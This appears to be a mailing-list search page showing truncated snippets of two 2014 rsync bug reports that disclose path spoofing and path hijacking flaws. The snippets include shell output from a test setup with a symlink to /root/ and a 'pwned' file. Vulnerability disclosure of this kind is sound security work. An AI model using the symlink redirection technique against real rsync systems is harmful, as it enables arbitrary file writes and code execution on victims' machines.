Displaying 2 results from an estimated 2 matches for "truedir".
2014 Dec 01
2
[Bug 10977] New: Rsync path spoofing attack vulnerability (rsync 3.1.1 tested)
...into the shared folder in rsync: a true folder and a symbolic link are directed to the root directory.
[root@pentest rsync]# ls -lh
total 8.0K
-rw-r--r-- 1 root root 2 Oct 31 03:16 1.txt
lrwxrwxrwx 1 root root 6 Oct 31 05:09 fakedir -> /root/
drwxr-xr-x 2 root root 4.0K Oct 31 05:08 truedir
Then enter the truedir folder, create a new file named "pwned".
[root@pentest rsync]# cd truedir/
[root@pentest truedir]# ls
[root@pentest truedir]# echo rsync test > pwned
[root@pentest truedir]# ls -lh
total 4.0K
-rw-r--r-- 1 root root 11 Oct 31 05:17 pwned
[root@...
2014 Nov 14
6
[Bug 10936] New: Rsync path hijacking attack vulnerability
...ers to write to arbitrary files, and consequently execute arbitrary code.
Vulnerability Details:
First I shared in the Rsync folder to write the following documents
[root@pentest rsync]# ls -lh
total 8.0K
-rw-r--r-- 1 root root 2 Oct 31 03:16 1.txt
drwxr-xr-x 2 root root 4.0K Oct 31 05:17 truedir
[root@pentest rsync]# cd truedir/
[root@pentest truedir]# ls
pwned
[root@pentest truedir]# cat pwned
rsync test
[root@pentest truedir]#
Next I modify the server to send the file code, in the process of synchronizing, the path of file "pwned" can be blocked and changed into a...